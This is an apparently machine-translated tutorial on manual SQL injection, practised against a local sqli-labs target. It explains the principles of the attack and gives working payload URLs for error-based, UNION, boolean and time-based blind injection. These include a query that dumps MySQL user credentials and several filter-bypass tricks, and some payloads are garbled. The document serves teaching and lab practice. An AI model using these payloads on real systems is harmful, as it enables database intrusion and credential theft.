1. Principle of SQL injection
1.1 Introduction to SQL Injection
SQL injection means that the web application does not judge the legitimacy of the user input data. The attacker can control when the front-end passes in the back-end parameters, and the parameters are substituted into the database for query. The attacker can construct different SQL statements to achieve the database Arbitrary operation
SQL injection vulnerabilities need to meet two conditions:
a. The parameters are user-controllable.
b. The parameters are brought into the database for query. The incoming parameters are spliced into the SQL statement and brought into the database for query.
1.2 SQL injection hazards
a. The sensitive information of the database is leaked
b, the page is tampered with,
c, the database is maliciously operated
d, the server is remotely controlled
1.3 SQL injection classification
a. SQL injection can be divided into two types according to the data type of the injection location: numeric type and string type (string injection, numeric injection)
b. According to the returned result, it can be divided into: error injection and blind injection
1.4 Reasons for SQL injection
a. The data and the code are not strictly separated
b. The parameter data submitted by the user is not fully checked and filtered and is brought into the SQL command, changes the original SQL command, and is executed by the target database
1.5 SQL injection process description
a. Data such as client parameter values are modified
b. The server has not checked and filtered the data to be modified into the SQL command, the SQL command function is modified
c, the database engine executes the modified SQL command
d, the client is based on The sensitive information obtained in the last injection is constructed to inject the sentence for the next injection
e. The server returns the result of the injection to the client
2. Manual SQL injection
2.1 GET and POST requests
a、GET提交:请求的数据会添加在URL之后,以?分割URL和传输数据,多个参数用&连接
b、POST提交:把提交的数据放到HTTP包的包体中
Difference: GET submitted data will be displayed in the address bar, while POST submitted, the address bar will not change
2.2 Error injection: Use symbols to confirm whether there is an injection point in the GET request
The address in this figure is http://127.0.0.1/sqli/less-1/?id=1 The address in
the figure below is increased',
so the error is displayed:''1'' LIMIT 0,1',
the SQL statement can be preliminarily inferred As: select xxx from xxxx where id='1' LIMIT 0,1
and it can be known that id is the injection point
2.3 Display error injection: judge the column of the data table by order by
Example: URL: http://127.0.0.1/sqli/Less-1/?id=1' order by 4 --+
Explanation: In the example, 'means to open the original SQL query and add order by 4 to achieve the change query ,-Means the original SQL statement after the comment, + means space
After testing, order by 1, order by 2, and order by 3 all work normally. When order by 4, the display interface is Unknown column '4' in'order clause', so there are 3 columns in this address data table.
2.4 Display error injection: query indication, field name, field value through union
2.4.1 Display data account, password, connection IP
SELECT * FROM security.`users` WHERE ID=0 UNION SELECT 1,1,GROUP_CONCAT(HOST,USER,PASSWORD) FROM mysql.`user`sql injection method:
http://127.0.0.1/sqli/less-1/?id=0' UNION SELECT 1,1,GROUP_CONCAT(HOST,USER,PASSWORD) FROM mysql. user--+
2.4.2 Display the current table name
SELECT * FROM users WHERE ID=0 UNION SELECT 1,2,DATABASE()sql injection method:
http://127.0.0.1/sqli/less-1/?id=0' UNION SELECT 1,2,DATABASE() --+
2.4.3 Query all tables in the current database of the mysql database
SELECT * FROM security.`users` WHERE ID=0 UNION SELECT 1,1,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()sql注入方式:
http://127.0.0.1/sqli/less-1/?id=0’ UNION SELECT 1,1,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() --+
2.4.4 Query the specified field in the current database of the mysql database
SELECT * FROM security.`users` WHERE ID=0 UNION SELECT 1,1,GROUP_CONCAT(column_name) FROM information_schema.`COLUMNS` WHERE table_schema=DATABASE() AND table_name='users'sql注入方式:
http://127.0.0.1/sqli/less-1/?id=0’ UNION SELECT 1,1,GROUP_CONCAT(column_name) FROM information_schema.COLUMNS WHERE table_schema=DATABASE() AND table_name=‘users’ --+
2.5 Blind note
2.5.1 Introduction to Blind Injection
Blind SQL (blind injection) is one of the injection attacks, where problems such as true or false occur to the database, and the result is judged based on the information returned by the application. This attack occurs because the application is configured to display only general errors, but it does not solve the code problem of SQL injection
2.5.1 Types of blinds
a, Boolean type
b, time blind
2.5.2 GET time-based blinds
Judge whether the current injection is correct by time delay
SELECT IF(ASCII(SUBSTR(DATABASE(),1,1))=113,1,SLEEP(5))In the above SQL statement, SUBSTR (string, start, length) means to take the field, take the first letter of the data table name obtained by Databases(), and compare the letter after converting it into a number through ASCII. if(condition,True,False).
SQL injection method:
http://127.0.0.1/sqli/less-1/?id=0' UNION IF(ASCII(SUBSTR(DATABASE(),1,1))=115,1,SLEEP(5))- -+
2.5.3 GET time-based Boolean blinds
Based on Boolean blind notes, we usually use the following method to guess the length of the database name
SELECT (SELECT LENGTH(DATABASE())>5)SQL injection method:
http://127.0.0.1/sqli/Less-8/?id=0' or (SELECT LENGTH(DATABASE())>5) --+
SELECT (SELECT ASCII(SUBSTR(DATABASE(),1,1)))>75SQL injection method:
http://127.0.0.1/sqli/Less-8/?id=0' or (SELECT ASCII(SUBSTR(DATABASE(),1,1)))>75 --+
2.6 POST injection
The injection method is the same as get. Generally, the POST submission point is in the submission box, not the URL bar.
2.6.1 Error-based injection characteristics of POST
1. POST request cannot be cached
2. POST request will not be saved in the browser browsing history
3. URL requested by POST cannot be saved as a browser bookmark
4. POST request has no length limit
3. SQL injection bypass means
3.1 Case bypass
Such as:
-a, AnD 1=1
-b, order by, you can use OrdER to bypass
3.2 Double write bypass
Such as:
uniunionon union is replaced with empty, or it can be bypassed in combination with case
3.3 Encoding bypass
Through URL encoding
3.4 Inline comment bypass
Through SQL comments
such as: / !select / * from users;